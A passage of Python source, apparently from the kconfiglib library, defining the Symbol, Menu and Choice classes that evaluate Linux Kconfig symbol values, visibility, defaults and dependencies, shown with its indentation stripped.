# Tokens after which identifier-like lexemes are treated as strings. T_CHOICE
# is included to avoid symbols being registered for named choices.
string_lex = frozenset((T_BOOL, T_TRISTATE, T_INT, T_HEX, T_STRING, T_CHOICE,
T_PROMPT, T_MENU, T_COMMENT, T_SOURCE, T_MAINMENU))
# Matches the initial token on a line; see _tokenize().
initial_token_re = re.compile(r"[^\w]*(\w+)")
# Matches an identifier/keyword optionally preceded by whitespace
id_keyword_re = re.compile(r"\s*([\w./-]+)")
# Regular expressions for parsing .config files
set_re = re.compile(r"CONFIG_(\w+)=(.*)")
unset_re = re.compile(r"# CONFIG_(\w+) is not set")
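# E.g., 'CONFIG_FOO=y' and 'CONFIG_BAR="hello"' match set_re, while
# '# CONFIG_BAZ is not set' matches unset_re.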
# Regular expression for finding $-references to symbols in strings
sym_ref_re = re.compile(r"\$[A-Za-z_][0-9A-Za-z_]*")
# Integers representing symbol types
UNKNOWN, BOOL, TRISTATE, STRING, HEX, INT = range(0, 6)
# Strings to use for types
typename = {
UNKNOWN : "unknown",
BOOL : "bool",
TRISTATE : "tristate",
STRING : "string",
HEX : "hex",
INT : "int" }
# Token to type mapping
token_to_type = { T_BOOL : BOOL,
T_TRISTATE : TRISTATE,
T_STRING : STRING,
T_INT : INT,
T_HEX : HEX }
# Default values for symbols of different types (the value the symbol gets if
# it is not assigned a user value and none of its 'default' clauses kick in)
default_value = { BOOL : "n",
TRISTATE : "n",
STRING : "",
INT : "",
HEX : "" }
# Indicates that no item is selected in a choice statement
NO_SELECTION = 0
# Integers representing expression types
OR, AND, NOT, EQUAL, UNEQUAL = range(0, 5)
# Map from tristate values to integers
tri_to_int = { "n" : 0, "m" : 1, "y" : 2 }
# Printing-related stuff
op_to_str = { AND : " && ",
OR : " || ",
EQUAL : " = ",
UNEQUAL : " != " }
precedence = { OR : 0, AND : 1, NOT : 2 }
# Types of informational messages
WARNING = 0
UNDEF_ASSIGN = 1
def _intersperse(lst, op):
"""_expr_to_str() helper. Gets the string representation of each expression in lst
and produces a list where op has been inserted between the elements."""
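# E.g., for lst = [A, B] and op = AND, the returned pieces join up to
# "A && B".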
if lst == []:
return ""
res = []
def handle_sub_expr(expr):
no_parens = isinstance(expr, (str, Symbol)) or \
expr[0] in (EQUAL, UNEQUAL) or \
precedence[op] <= precedence[expr[0]]
if not no_parens:
res.append("(")
res.extend(_expr_to_str_rec(expr))
if not no_parens:
res.append(")")
op_str = op_to_str[op]
handle_sub_expr(lst[0])
for expr in lst[1:]:
res.append(op_str)
handle_sub_expr(expr)
return res
def _expr_to_str(expr):
s = "".join(_expr_to_str_rec(expr))
return s
def _sym_str_string(sym_or_str):
if isinstance(sym_or_str, str):
return '"{0}"'.format(sym_or_str)
return sym_or_str.name
def _expr_to_str_rec(expr):
if expr is None:
return [""]
if isinstance(expr, (Symbol, str)):
return [_sym_str_string(expr)]
e0 = expr[0]
if e0 == OR or e0 == AND:
return _intersperse(expr[1], expr[0])
if e0 == NOT:
need_parens = not isinstance(expr[1], (str, Symbol))
res = ["!"]
if need_parens:
res.append("(")
res.extend(_expr_to_str_rec(expr[1]))
if need_parens:
res.append(")")
return res
if e0 == EQUAL or e0 == UNEQUAL:
return [_sym_str_string(expr[1]),
op_to_str[expr[0]],
_sym_str_string(expr[2])]
class _Block:
"""Represents a list of items (symbols, menus, choice statements and
comments) appearing at the top-level of a file or within a menu, choice or
if statement."""
def __init__(self):
self.items = []
def get_items(self):
return self.items
def add_item(self, item):
self.items.append(item)
def _make_conf(self):
# Collect the substrings in a list and later use join() instead of +=
# to build the final .config contents. With older Python versions, this
# yields linear instead of quadratic complexity.
strings = []
for item in self.items:
strings.extend(item._make_conf())
return strings
def add_depend_expr(self, expr):
for item in self.items:
item.add_depend_expr(expr)
class Item():
"""Base class for symbols and other Kconfig constructs. Subclasses are
Symbol, Choice, Menu, and Comment."""
def is_symbol(self):
"""Returns True if the item is a symbol, otherwise False. Short for
isinstance(item, kconfiglib.Symbol)."""
return isinstance(self, Symbol)
def is_choice(self):
"""Returns True if the item is a choice, otherwise False. Short for
isinstance(item, kconfiglib.Choice)."""
return isinstance(self, Choice)
def is_menu(self):
"""Returns True if the item is a menu, otherwise False. Short for
isinstance(item, kconfiglib.Menu)."""
return isinstance(self, Menu)
def is_comment(self):
"""Returns True if the item is a comment, otherwise False. Short for
isinstance(item, kconfiglib.Comment)."""
return isinstance(self, Comment)
class _HasVisibility():
"""Base class for elements that have a "visibility" that acts as an upper
limit on the values a user can set for them. Subclasses are Symbol and
Choice (which supply some of the attributes)."""
def __init__(self):
self.cached_visibility = None
self.prompts = []
def _invalidate(self):
self.cached_visibility = None
def _get_visibility(self):
if self.cached_visibility is None:
vis = "n"
for (prompt, cond_expr) in self.prompts:
vis = self.config._eval_max(vis, cond_expr)
if isinstance(self, Symbol) and self.is_choice_symbol_:
vis = self.config._eval_min(vis, self.parent._get_visibility())
# Promote "m" to "y" if we're dealing with a non-tristate
if vis == "m" and self.type != TRISTATE:
vis = "y"
self.cached_visibility = vis
return self.cached_visibility
class Symbol(Item, _HasVisibility):
"""Represents a configuration symbol - e.g. FOO for
config FOO
..."""
#
# Public interface
#
def get_value(self):
"""Calculate and return the value of the symbol. See also
Symbol.set_user_value()."""
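# In broad strokes, mirroring the C implementation: visibility caps the
# user value, 'default' clauses kick in when there is no (effective)
# user value, and reverse dependencies from 'select' act as a lower
# bound on bool/tristate results.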
if self.cached_value is not None:
return self.cached_value
self.write_to_conf = False
# As a quirk of Kconfig, undefined symbols get their name as their
# value. This is why things like "FOO = bar" work for seeing if FOO has
# the value "bar".
if self.type == UNKNOWN:
self.cached_value = self.name
return self.name
new_val = default_value[self.type]
vis = self._get_visibility()
if self.type == BOOL or self.type == TRISTATE:
# The visibility and mode (modules-only or single-selection) of
# choice items will be taken into account in self._get_visibility()
if self.is_choice_symbol_:
if vis != "n":
choice = self.parent
mode = choice.get_mode()
self.write_to_conf = (mode != "n")
if mode == "y":
new_val = "y" if (choice.get_selection() is self) else "n"
elif mode == "m":
if self.user_val == "m" or self.user_val == "y":
new_val = "m"
else:
use_defaults = True
if vis != "n":
# If the symbol is visible and has a user value, use that.
# Otherwise, look at defaults.
self.write_to_conf = True
if self.user_val is not None:
new_val = self.config._eval_min(self.user_val, vis)
use_defaults = False
if use_defaults:
for (val_expr, cond_expr) in self.def_exprs:
cond_eval = self.config._eval_expr(cond_expr)
if cond_eval != "n":
self.write_to_conf = True
new_val = self.config._eval_min(val_expr, cond_eval)
break
# Reverse dependencies take precedence
rev_dep_val = self.config._eval_expr(self.rev_dep)
if rev_dep_val != "n":
self.write_to_conf = True
new_val = self.config._eval_max(new_val, rev_dep_val)
# Promote "m" to "y" for booleans
if new_val == "m" and self.type == BOOL:
new_val = "y"
elif self.type == STRING:
use_defaults = True
if vis != "n":
self.write_to_conf = True
if self.user_val is not None:
new_val = self.user_val
use_defaults = False
if use_defaults:
for (val_expr, cond_expr) in self.def_exprs:
if self.config._eval_expr(cond_expr) != "n":
self.write_to_conf = True
new_val = self.config._get_str_value(val_expr)
break
elif self.type == HEX or self.type == INT:
has_active_range = False
low = None
high = None
use_defaults = True
base = 16 if self.type == HEX else 10
for (l, h, cond_expr) in self.ranges:
if self.config._eval_expr(cond_expr) != "n":
has_active_range = True
low_str = self.config._get_str_value(l)
high_str = self.config._get_str_value(h)
low = int(low_str, base) if \
_is_base_n(low_str, base) else 0
high = int(high_str, base) if \
_is_base_n(high_str, base) else 0
break
if vis != "n":
self.write_to_conf = True
if self.user_val is not None and \
_is_base_n(self.user_val, base) and \
(not has_active_range or
low <= int(self.user_val, base) <= high):
# If the user value is OK, it is stored in exactly the same
# form as specified in the assignment (with or without
# "0x", etc).
use_defaults = False
new_val = self.user_val
if use_defaults:
for (val_expr, cond_expr) in self.def_exprs:
if self.config._eval_expr(cond_expr) != "n":
self.write_to_conf = True
# If the default value is OK, it is stored in exactly
# the same form as specified. Otherwise, it is clamped
# to the range, and the output has "0x" as appropriate
# for the type.
new_val = self.config._get_str_value(val_expr)
if _is_base_n(new_val, base):
new_val_num = int(new_val, base)
if has_active_range:
clamped_val = None
if new_val_num < low:
clamped_val = low
elif new_val_num > high:
clamped_val = high
if clamped_val is not None:
new_val = (hex(clamped_val) if \
self.type == HEX else str(clamped_val))
break
else: # For the for loop
# If no user value or default kicks in but the hex/int has
# an active range, then the low end of the range is used,
# provided it's > 0, with "0x" prepended as appropriate.
if has_active_range and low > 0:
new_val = (hex(low) if self.type == HEX else str(low))
self.cached_value = new_val
return new_val
def set_user_value(self, v):
"""Sets the user value of the symbol.
Equal in effect to assigning the value to the symbol within a .config
file. Use get_lower/upper_bound() or get_assignable_values() to find
the range of currently assignable values for bool and tristate symbols;
setting values outside this range will cause the user value to differ
from the result of Symbol.get_value() (be truncated). Values that are
invalid for the type (such as a_bool.set_user_value("foo")) are
ignored, and a warning is emitted if an attempt is made to assign such
a value.
For any type of symbol, is_modifiable() can be used to check if a user
value will currently have any effect on the symbol, as determined by
its visibility and range of assignable values. Any value that is valid
for the type (bool, tristate, etc.) will end up being reflected in
get_user_value() though, and might have an effect later if conditions
change. To get rid of the user value, use unset_user_value().
Any symbols dependent on the symbol are (recursively) invalidated, so
things will just work with regards to dependencies.
v -- The user value to give to the symbol."""
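# A minimal usage sketch (FOO is a hypothetical bool/tristate symbol):
#   conf["FOO"].set_user_value("y")
# has the same effect as the line 'CONFIG_FOO=y' in a loaded .config.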
self._set_user_value_no_invalidate(v, False)
# There might be something more efficient you could do here, but play
# it safe.
if self.name == "MODULES":
self.config._invalidate_all()
return
self._invalidate()
self._invalidate_dependent()
def unset_user_value(self):
"""Resets the user value of the symbol, as if the symbol had never
gotten a user value via Config.load_config() or
Symbol.set_user_value()."""
self._unset_user_value_no_recursive_invalidate()
self._invalidate_dependent()
def get_user_value(self):
"""Returns the value assigned to the symbol in a .config or via
Symbol.set_user_value() (provided the value was valid for the type of the
symbol). Returns None in case of no user value."""
return self.user_val
def get_name(self):
"""Returns the name of the symbol."""
return self.name
def get_upper_bound(self):
"""For string/hex/int symbols and for bool and tristate symbols that
cannot be modified (see is_modifiable()), returns None.
Otherwise, returns the highest value the symbol can be set to with
Symbol.set_user_value() (that will not be truncated): one of "m" or "y",
arranged from lowest to highest. This corresponds to the highest value
the symbol could be given in e.g. the 'make menuconfig' interface.
See also the tri_less*() and tri_greater*() functions, which could come
in handy."""
if self.type != BOOL and self.type != TRISTATE:
return None
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
vis = self._get_visibility()
if (tri_to_int[vis] - tri_to_int[rev_dep]) > 0:
return vis
return None
def get_lower_bound(self):
"""For string/hex/int symbols and for bool and tristate symbols that
cannot be modified (see is_modifiable()), returns None.
Otherwise, returns the lowest value the symbol can be set to with
Symbol.set_user_value() (that will not be truncated): one of "n" or "m",
arranged from lowest to highest. This corresponds to the lowest value
the symbol could be given in e.g. the 'make menuconfig' interface.
See also the tri_less*() and tri_greater*() functions, which could come
in handy."""
if self.type != BOOL and self.type != TRISTATE:
return None
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
if (tri_to_int[self._get_visibility()] - tri_to_int[rev_dep]) > 0:
return rev_dep
return None
def get_assignable_values(self):
"""For string/hex/int symbols and for bool and tristate symbols that
cannot be modified (see is_modifiable()), returns the empty list.
Otherwise, returns a list containing the user values that can be
assigned to the symbol (that won't be truncated). Usage example:
if "m" in sym.get_assignable_values():
sym.set_user_value("m")
This is basically a more convenient interface to
get_lower/upper_bound() when wanting to test if a particular tristate
value can be assigned."""
if self.type != BOOL and self.type != TRISTATE:
return []
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
res = ["n", "m", "y"][tri_to_int[rev_dep] :
tri_to_int[self._get_visibility()] + 1]
return res if len(res) > 1 else []
def get_type(self):
"""Returns the type of the symbol: one of UNKNOWN, BOOL, TRISTATE,
STRING, HEX, or INT. These are defined at the top level of the module,
so you'd do something like
if sym.get_type() == kconfiglib.STRING:
..."""
return self.type
def get_visibility(self):
"""Returns the visibility of the symbol: one of "n", "m" or "y". For
bool and tristate symbols, this is an upper bound on the value users
can set for the symbol. For other types of symbols, a visibility of "n"
means the user value will be ignored. A visibility of "n" corresponds
to not being visible in the 'make *config' interfaces.
Example (assuming we're running with modules enabled -- i.e., MODULES
set to 'y'):
# Assume this has been assigned 'n'
config N_SYM
tristate "N_SYM"
# Assume this has been assigned 'm'
config M_SYM
tristate "M_SYM"
# Has visibility 'n'
config A
tristate "A"
depends on N_SYM
# Has visibility 'm'
config B
tristate "B"
depends on M_SYM
# Has visibility 'y'
config C
tristate "C"
# Has no prompt, and hence visibility 'n'
config D
tristate
Having visibility be tri-valued ensures that e.g. a symbol cannot be
set to "y" by the user if it depends on a symbol with value "m", which
wouldn't be safe.
You should probably look at get_lower/upper_bound(),
get_assignable_values() and is_modifiable() before using this."""
return self._get_visibility()
def get_parent(self):
"""Returns the menu or choice statement that contains the symbol, or
None if the symbol is at the top level. Note that if statements are
treated as syntactic and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""Returns the set() of all symbols referenced by this symbol. For
example, the symbol defined by
config FOO
bool
prompt "foo" if A && B
default C if D
depends on E
select F if G
references the symbols A through G.
refs_from_enclosing (default: False) -- If True, the symbols
referenced by enclosing menus and if's will be
included in the result."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_selected_symbols(self):
"""Returns the set() of all symbols X for which this symbol has a
'select X' or 'select X if Y' (regardless of whether Y is satisfied or
not). This is a subset of the symbols returned by
get_referenced_symbols()."""
return self.selected_syms
def get_help(self):
"""Returns the help text of the symbol, or None if the symbol has no
help text."""
return self.help
def get_config(self):
"""Returns the Config instance this symbol is from."""
return self.config
def get_def_locations(self):
"""Returns a list of (filename, linenr) tuples, where filename (string)
and linenr (int) represent a location where the symbol is defined. For
the vast majority of symbols this list will only contain one element.
For the following Kconfig, FOO would get two entries: the lines marked
with *.
config FOO *
bool "foo prompt 1"
config FOO *
bool "foo prompt 2"
"""
return self.def_locations
def get_ref_locations(self):
"""Returns a list of (filename, linenr) tuples, where filename (string)
and linenr (int) represent a location where the symbol is referenced in
the configuration. For example, the lines marked by * would be included
for FOO below:
config A
bool
default BAR || FOO *
config B
tristate
depends on FOO *
default m if FOO *
if FOO *
config A
bool "A"
endif
config FOO (definition not included)
bool
"""
return self.ref_locations
def is_modifiable(self):
"""Returns True if the value of the symbol could be modified by calling
Symbol.set_user_value() and False otherwise.
For bools and tristates, this corresponds to the symbol being visible
in the 'make menuconfig' interface and not already being pinned to a
specific value (e.g. because it is selected by another symbol).
For strings and numbers, this corresponds to just being visible. (See
Symbol.get_visibility().)"""
if self.is_special_:
return False
if self.type == BOOL or self.type == TRISTATE:
rev_dep = self.config._eval_expr(self.rev_dep)
# A bool selected to "m" gets promoted to "y"
if self.type == BOOL and rev_dep == "m":
rev_dep = "y"
return (tri_to_int[self._get_visibility()] -
tri_to_int[rev_dep]) > 0
return self._get_visibility() != "n"
def is_defined(self):
"""Returns False if the symbol is referred to in the Kconfig but never
actually defined, otherwise True."""
return self.is_defined_
def is_special(self):
"""Returns True if the symbol is one of the special symbols n, m, y, or
UNAME_RELEASE, or gets its value from the environment. Otherwise,
returns False."""
return self.is_special_
def is_from_environment(self):
"""Returns True if the symbol gets its value from the environment.
Otherwise, returns False."""
return self.is_from_env
def has_ranges(self):
"""Returns True if the symbol is of type INT or HEX and has ranges that
limits what values it can take on, otherwise False."""
return self.ranges != []
def is_choice_symbol(self):
"""Returns True if the symbol is in a choice statement and is an actual
choice symbol (see Choice.get_symbols()); otherwise, returns
False."""
return self.is_choice_symbol_
def is_choice_selection(self):
"""Returns True if the symbol is contained in a choice statement and is
the selected item, otherwise False. Equivalent to 'sym.is_choice_symbol()
and sym.get_parent().get_selection() is sym'."""
return self.is_choice_symbol_ and self.parent.get_selection() is self
def __str__(self):
"""Returns a string containing various information about the symbol."""
return self.config._get_sym_or_choice_str(self)
#
# Private methods
#
def __init__(self):
"""Symbol constructor -- not intended to be called directly by
kconfiglib clients."""
# Set default values
_HasVisibility.__init__(self)
self.config = None
self.parent = None
self.name = None
self.type = UNKNOWN
self.def_exprs = []
self.ranges = []
self.rev_dep = "n"
# The prompt, default value and select conditions without any
# dependencies from menus or if's propagated to them
self.orig_prompts = []
self.orig_def_exprs = []
self.orig_selects = []
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
self.help = None
# The set of symbols referenced by this symbol (see
# get_referenced_symbols())
self.referenced_syms = set()
# The set of symbols selected by this symbol (see
# get_selected_symbols())
self.selected_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = set()
# This is set to True for "actual" choice symbols. See
# Choice._determine_actual_symbols(). The trailing underscore avoids a
# collision with is_choice_symbol().
self.is_choice_symbol_ = False
# This records only dependencies specified with 'depends on'. Needed
# when determining actual choice items (hrrrr...). See also
# Choice._determine_actual_symbols().
self.menu_dep = None
# See Symbol.get_ref/def_locations().
self.def_locations = []
self.ref_locations = []
self.user_val = None
# Flags
# Should the symbol get an entry in .config?
self.write_to_conf = False
# Caches the calculated value
self.cached_value = None
# Note: An instance variable 'self.dep' gets set on the Symbol in
# Config._build_dep(), linking the symbol to the symbols that
# immediately depend on it (in a caching/invalidation sense). The total
# set of dependent symbols for the symbol (the transitive closure) is
# calculated on an as-needed basis in _get_dependent().
# Caches the total list of dependent symbols. Calculated in
# _get_dependent().
self.cached_deps = None
# Does the symbol have an entry in the Kconfig file? The trailing
# underscore avoids a collision with is_defined().
self.is_defined_ = False
# Does the symbol get its value in some special way, e.g. from the
# environment or by being one of the special symbols n, m, and y? If
# so, the value is stored in self.cached_value, which is never
# invalidated. The trailing underscore avoids a collision with
# is_special().
self.is_special_ = False
# Does the symbol get its value from the environment?
self.is_from_env = False
def _invalidate(self):
if self.is_special_:
return
if self.is_choice_symbol_:
self.parent._invalidate()
_HasVisibility._invalidate(self)
self.write_to_conf = False
self.cached_value = None
def _invalidate_dependent(self):
for sym in self._get_dependent():
sym._invalidate()
def _set_user_value_no_invalidate(self, v, suppress_load_warnings):
"""Like set_user_value(), but does not invalidate any symbols.
suppress_load_warnings --
some warnings are annoying when loading a .config that can be helpful
when manually invoking set_user_value(). This flag is set to True to
suppress such warnings.
Perhaps this could be made optional for load_config() instead."""
if self.is_special_:
if self.is_from_env:
self.config._warn('attempt to assign the value "{0}" to the '
'symbol {1}, which gets its value from the '
'environment. Assignment ignored.'
.format(v, self.name))
else:
self.config._warn('attempt to assign the value "{0}" to the '
'special symbol {1}. Assignment ignored.'
.format(v, self.name))
return
if not self.is_defined_:
filename, linenr = self.ref_locations[0]
self.config._undef_assign('attempt to assign the value "{0}" to {1}, '
"which is referenced at {2}:{3} but never "
"defined. Assignment ignored."
.format(v, self.name, filename, linenr))
return
# Check if the value is valid for our type
if not (( self.type == BOOL and (v == "n" or v == "y") ) or
( self.type == TRISTATE and (v == "n" or v == "m" or
v == "y") ) or
( self.type == STRING ) or
( self.type == INT and _is_base_n(v, 10) ) or
( self.type == HEX and _is_base_n(v, 16) )):
self.config._warn('the value "{0}" is invalid for {1}, which has type {2}. '
"Assignment ignored."
.format(v, self.name, typename[self.type]))
return
if self.prompts == [] and not suppress_load_warnings:
self.config._warn('assigning "{0}" to the symbol {1} which '
'lacks prompts and thus has visibility "n". '
'The assignment will have no effect.'
.format(v, self.name))
self.user_val = v
if self.is_choice_symbol_ and (self.type == BOOL or
self.type == TRISTATE):
choice = self.parent
if v == "y":
choice.user_val = self
choice.user_mode = "y"
elif v == "m":
choice.user_val = None
choice.user_mode = "m"
def _unset_user_value_no_recursive_invalidate(self):
self._invalidate()
self.user_val = None
if self.is_choice_symbol_:
self.parent._unset_user_value()
def _make_conf(self):
if self.already_written:
return []
self.already_written = True
# Note: write_to_conf is determined in get_value()
val = self.get_value()
if not self.write_to_conf:
return []
if self.type == BOOL or self.type == TRISTATE:
if val == "m" or val == "y":
return ["CONFIG_{0}={1}".format(self.name, val)]
return ["# CONFIG_{0} is not set".format(self.name)]
elif self.type == STRING:
# Escape \ and "
return ['CONFIG_{0}="{1}"'
.format(self.name,
val.replace("\\", "\\\\").replace('"', '\\"'))]
elif self.type == INT or self.type == HEX:
return ["CONFIG_{0}={1}".format(self.name, val)]
else:
_internal_error('Internal error while creating .config: unknown type "{0}".'
.format(self.type))
def _get_dependent(self):
"""Returns the set of symbols that should be invalidated if the value
of the symbol changes, because they might be affected by the change.
Note that this is an internal API -- it's probably of limited
usefulness to clients."""
if self.cached_deps is not None:
return self.cached_deps
res = set()
self._add_dependent_ignore_siblings(res)
if self.is_choice_symbol_:
for s in self.parent.get_symbols():
if s is not self:
res.add(s)
s._add_dependent_ignore_siblings(res)
self.cached_deps = res
return res
def _add_dependent_ignore_siblings(self, to):
"""Calculating dependencies gets a bit tricky for choice items as they
all depend on each other, potentially leading to infinite recursion.
This helper function calculates dependencies ignoring the other symbols
in the choice. It also works fine for symbols that are not choice
items."""
for s in self.dep:
to.add(s)
to |= s._get_dependent()
def _has_auto_menu_dep_on(self, on):
"""See Choice._determine_actual_symbols()."""
if not isinstance(self.parent, Choice):
_internal_error("Attempt to determine auto menu dependency for symbol ouside of choice.")
if self.prompts == []:
# If we have no prompt, use the menu dependencies instead (what was
# specified with 'depends on')
return self.menu_dep is not None and \
self.config._expr_depends_on(self.menu_dep, on)
for (_, cond_expr) in self.prompts:
if self.config._expr_depends_on(cond_expr, on):
return True
return False
class Menu(Item):
"""Represents a menu statement."""
#
# Public interface
#
def get_config(self):
"""Return the Config instance this menu is from."""
return self.config
def get_visibility(self):
"""Returns the visibility of the menu. This also affects the visibility
of subitems. See also Symbol.get_visibility()."""
return self.config._eval_expr(self.dep_expr)
def get_visible_if_visibility(self):
"""Returns the visibility the menu gets from its 'visible if'
condition. "y" if the menu has no 'visible if' condition."""
return self.config._eval_expr(self.visible_if_expr)
def get_items(self, recursive = False):
"""Returns a list containing the items (symbols, menus, choice
statements and comments) in the menu, in the same order that the
items appear within the menu.
recursive (default: False) -- True if items contained in items within
the menu should be included
recursively (preorder)."""
if not recursive:
return self.block.get_items()
res = []
for item in self.block.get_items():
res.append(item)
if isinstance(item, Menu):
res.extend(item.get_items(True))
elif isinstance(item, Choice):
res.extend(item.get_items())
return res
def get_symbols(self, recursive = False):
"""Returns a list containing the symbols in the menu, in the same order
that they appear within the menu.
recursive (default: False) -- True if symbols contained in items within
the menu should be included
recursively."""
return [item for item in self.get_items(recursive) if isinstance(item, Symbol)]
def get_title(self):
"""Returns the title text of the menu."""
return self.title
def get_parent(self):
"""Returns the menu or choice statement that contains the menu, or
None if the menu is at the top level. Note that if statements are
treated as syntactic sugar and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""See Symbol.get_referenced_symbols()."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_location(self):
"""Returns the location of the menu as a (filename, linenr) tuple,
where filename is a string and linenr an int."""
return (self.filename, self.linenr)
def __str__(self):
"""Returns a string containing various information about the menu."""
depends_on_str = self.config._expr_val_str(self.orig_deps,
"(no dependencies)")
visible_if_str = self.config._expr_val_str(self.visible_if_expr,
"(no dependencies)")
additional_deps_str = " " + self.config._expr_val_str(self.deps_from_containing,
"(no additional dependencies)")
return _sep_lines("Menu",
"Title : " + self.title,
"'depends on' dependencies : " + depends_on_str,
"'visible if' dependencies : " + visible_if_str,
"Additional dependencies from enclosing menus and if's:",
additional_deps_str,
"Location: {0}:{1}".format(self.filename, self.linenr))
#
# Private methods
#
def __init__(self):
"""Menu constructor -- not intended to be called directly by
kconfiglib clients."""
self.config = None
self.parent = None
self.title = None
self.block = None
self.dep_expr = None
# Dependency expression without dependencies from enclosing menus and
# if's propagated
self.orig_deps = None
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
# The 'visible if' expression
self.visible_if_expr = None
# The set of symbols referenced by this menu (see
# get_referenced_symbols())
self.referenced_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = None
self.filename = None
self.linenr = None
def _make_conf(self):
item_conf = self.block._make_conf()
if self.config._eval_expr(self.dep_expr) != "n" and \
self.config._eval_expr(self.visible_if_expr) != "n":
return ["\n#\n# {0}\n#".format(self.title)] + item_conf
return item_conf
class Choice(Item, _HasVisibility):
"""Represents a choice statement. A choice can be in one of three modes:
"n" - The choice is not visible and no symbols can be selected.
"m" - Any number of symbols can be set to "m". The rest will be "n". This
is safe since potentially conflicting options don't actually get
compiled into the kernel simultaneously with "m".
"y" - One symbol will be "y" while the rest are "n".
Only tristate choices can be in "m" mode, and the visibility of the choice
is an upper bound on the mode, so that e.g. a choice that depends on a
symbol with value "m" will be in "m" mode.
The mode changes automatically when a value is assigned to a symbol within
the choice.
See Symbol.get_visibility() too."""
#
# Public interface
#
def get_selection(self):
"""Returns the symbol selected (either by the user or through
defaults), or None if either no symbol is selected or the mode is not
"y"."""
if self.cached_selection is not None:
if self.cached_selection == NO_SELECTION:
return None
return self.cached_selection
if self.get_mode() != "y":
return self._cache_ret(None)
# User choice available?
if self.user_val is not None and \
self.user_val._get_visibility() == "y":
return self._cache_ret(self.user_val)
if self.optional:
return self._cache_ret(None)
return self._cache_ret(self.get_selection_from_defaults())
def get_selection_from_defaults(self):
"""Like Choice.get_selection(), but acts as if no symbol has been
selected by the user and no 'optional' flag is in effect."""
if self.actual_symbols == []:
return None
for (symbol, cond_expr) in self.def_exprs:
if self.config._eval_expr(cond_expr) != "n":
chosen_symbol = symbol
break
else:
chosen_symbol = self.actual_symbols[0]
# Is the chosen symbol visible?
if chosen_symbol._get_visibility() != "n":
return chosen_symbol
# Otherwise, pick the first visible symbol
for sym in self.actual_symbols:
if sym._get_visibility() != "n":
return sym
return None
def get_user_selection(self):
"""If the choice is in "y" mode and has a user-selected symbol, returns
that symbol. Otherwise, returns None."""
return self.user_val
def get_config(self):
"""Returns the Config instance this choice is from."""
return self.config
def get_name(self):
"""For named choices, returns the name. Returns None for unnamed
choices. No named choices appear anywhere in the kernel Kconfig files
as of Linux 3.7.0-rc8."""
return self.name
def get_help(self):
"""Returns the help text of the choice, or None if the choice has no
help text."""
return self.help
def get_type(self):
"""Returns the type of the choice. See Symbol.get_type()."""
return self.type
def get_items(self):
"""Gets all items contained in the choice in the same order as within
the configuration ("items" instead of "symbols" since choices and
comments might appear within choices. This only happens in one place as
of Linux 3.7.0-rc8, in drivers/usb/gadget/Kconfig)."""
return self.block.get_items()
def get_symbols(self):
"""Returns a list containing the choice's symbols.
A quirk (perhaps a bug) of Kconfig is that you can put items within a
choice that will not be considered members of the choice insofar as
selection is concerned. This happens for example if one symbol within a
choice 'depends on' the symbol preceding it, or if you put non-symbol
items within choices.
As of Linux 3.7.0-rc8, this seems to be used intentionally in one
place: drivers/usb/gadget/Kconfig.
This function returns the "proper" symbols of the choice in the order
they appear in the choice, excluding such items. If you want all items
in the choice, use get_items()."""
return self.actual_symbols
def get_parent(self):
"""Returns the menu or choice statement that contains the choice, or
None if the choice is at the top level. Note that if statements are
treated as syntactic sugar and do not have an explicit class
representation."""
return self.parent
def get_referenced_symbols(self, refs_from_enclosing = False):
"""See Symbol.get_referenced_symbols()."""
return self.all_referenced_syms if refs_from_enclosing else self.referenced_syms
def get_def_locations(self):
"""Returns a list of (filename, linenr) tuples, where filename (string)
and linenr (int) represent a location where the choice is defined. For
the vast majority of choices (all of them as of Linux 3.7.0-rc8) this
list will only contain one element, but it's possible for named choices
to be defined in multiple locations."""
return self.def_locations
def get_visibility(self):
"""Returns the visibility of the choice statement: one of "n", "m" or
"y". This acts as an upper limit on the mode of the choice (though bool
choices can only have the mode "y"). See the class documentation for an
explanation of modes."""
return self._get_visibility()
def get_mode(self):
"""Returns the mode of the choice. See the class documentation for
an explanation of modes."""
minimum_mode = "n" if self.optional else "m"
mode = self.user_mode if self.user_mode is not None else minimum_mode
mode = self.config._eval_min(mode, self._get_visibility())
# Promote "m" to "y" for boolean choices
if mode == "m" and self.type == BOOL:
return "y"
return mode
def is_optional(self):
"""Returns True if the symbol has the optional flag set (and so will default
to "n" mode). Otherwise, returns False."""
return self.optional
def __str__(self):
"""Returns a string containing various information about the choice
statement."""
return self.config._get_sym_or_choice_str(self)
#
# Private methods
#
def __init__(self):
"""Choice constructor -- not intended to be called directly by
kconfiglib clients."""
_HasVisibility.__init__(self)
self.config = None
self.parent = None
self.name = None # Yes, choices can be named
self.type = UNKNOWN
self.def_exprs = []
self.help = None
self.optional = False
self.block = None
# The prompts and default values without any dependencies from
# enclosing menus or if's propagated
self.orig_prompts = []
self.orig_def_exprs = []
# Dependencies inherited from containing menus and if's
self.deps_from_containing = None
# We need to filter out symbols that appear within the choice block but
# are not considered choice items (see
# Choice._determine_actual_symbols()) This list holds the "actual" choice
# items.
self.actual_symbols = []
# The set of symbols referenced by this choice (see
# get_referenced_symbols())
self.referenced_syms = set()
# Like 'referenced_syms', but includes symbols from
# dependencies inherited from enclosing menus and if's
self.all_referenced_syms = set()
# See Choice.get_def_locations()
self.def_locations = []
self.user_val = None
self.user_mode = None
self.cached_selection = None
def _determine_actual_symbols(self):
"""If a symbol's visibility depends on the preceding symbol within a
choice, it is no longer viewed as a choice item (quite possibly a bug,
but some things consciously use it... ugh. It stems from automatic
submenu creation). In addition, it's possible to have choices and
comments within choices, and those shouldn't be considered as choice
